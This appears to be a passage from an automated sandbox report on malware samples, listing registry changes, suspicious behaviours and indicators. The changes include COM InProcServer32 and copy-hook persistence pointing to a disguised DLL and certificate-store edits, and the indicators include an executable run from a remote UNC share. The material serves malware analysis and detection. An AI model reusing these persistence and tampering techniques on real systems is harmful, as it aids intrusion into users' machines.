Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 0100000000000000e729863a1f1eda01 C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice\ProgId = "MSEdgeHTM" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2632 = "Norfolk Standard Time" C:\Windows\windefender.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\SmartScreenEnabled\ = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\PreferenceMACs\Default\extensions.settings\iglcjdemknebjbklcgkfaebgojjphkec = "97DF06469908D6AC9762D237429DCFC3036C2467920A16C48FAAA29907638D36" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C} {000214E6-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000b5bbf15a1f1eda01 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\qkTATVOZOEOSiyaz\OUlMYnQejiLZPVP\jxwpNFc.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\inetcpl.cpl,-4313#immutable1 = "Configure your Internet display and connection settings." C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3811856890-180006922-3689258494-1000\{EC453CD8-A633-4515-8B4C-C1389CC77745} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-45#immutable1 = "Make your computer easier to use." C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings C:\Users\Admin\Downloads\2023-11-23-12\9c8162115273ea9afdba3d35d7451f45913ba9764ad626a4cbebc8e9eb734396.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\CLSID\{2E927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\telephon.cpl,-2#immutable1 = "Configure your telephone dialing rules and modem settings." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3001#immutable1 = "Sync files between your computer and network folders" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\26\Shell\SniffedFolderType = "Generic" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\9 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-4#immutable1 = "Device Manager" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 000000000600000004000000080000000500000001000000070000000300000002000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\.lang\ = "lang_auto_file" C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\inetcpl.cpl,-4312#immutable1 = "Internet Options" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\7 = 640031000000000077570e7b10003230433836427e3100004c0009000400efbe77570b7b77570e7b2e00000090db01000000a800000000000000000000000000000058e2bd0032003000320033002d00310031002d00320031002d0031003900000018000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\appwiz.cpl,-160#immutable1 = "Uninstall or change programs on your computer." C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\32\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fhcpl.dll,-2#immutable1 = "Keep a history of your files" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx\ = "{2E927ADE-D054-3EEC-3838-31EC2C3651EB}" C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\鰀䆟縀䆁 C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-2#immutable1 = "Configure how speech recognition works on your computer." C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\33\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307} C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202020202020202020202020202020202020202020202 C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32\ = "C:\\Program Files\\Windows Media Player\\Media Renderer\\WordCount.dll" C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 060000000400000008000000050000000100000007000000000000000300000002000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-1#immutable1 = "BitLocker Drive Encryption" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\32\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Mode = "6" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\32\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\IconSize = "48" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\34 C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sud.dll,-1#immutable1 = "Default Programs" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-1#immutable1 = "User Accounts" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\26\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000090000000600000004000000080000000500000001000000070000000300000002000000ffffffff C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\CLSID\{1F927ADE-D054-3EEC-3838-31EC2C3651EB}\InProcServer32 C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-103#immutable1 = "Customize your keyboard settings, such as the cursor blink rate and the character repeat rate." C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "32" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\33\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\LogicalViewMode = "3" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\9\NodeSlot = "34" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 0700000006000000050000000400000003000000020000000100000000000000ffffffff C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\CopyHookHandlers\FileSystemEx C:\Users\Admin\Downloads\2023-11-23-07\eb4c556151199591ad7d51bd5302b385284c98083711bcb9674225c495aea26a.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\lang_auto_file\shell\Read C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-2#immutable1 = "Customize settings for the display of languages, numbers, times, and dates." C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\32\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\FFlags = "18874385" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\33\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Rev = "0" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\.lang C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Windows\explorer.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ghstve.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yrrpszk.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\04702e94785f87904b222753af1b9e149c07d578ba6f5a97e84353dd10f1ef8c\orders2\Order_Summary.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cpqflwztt.exe N/A
N/A N/A \??\UNC\62.173.141.116\scarica\paypal_inv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe N/A
N/A N/A C:\Users\Admin\Downloads\2023-11-23-07\1064606237c6838a948c3ab85b2c95df70c8f85e87958b7e3f9bff9d79e2a645.exe N/A
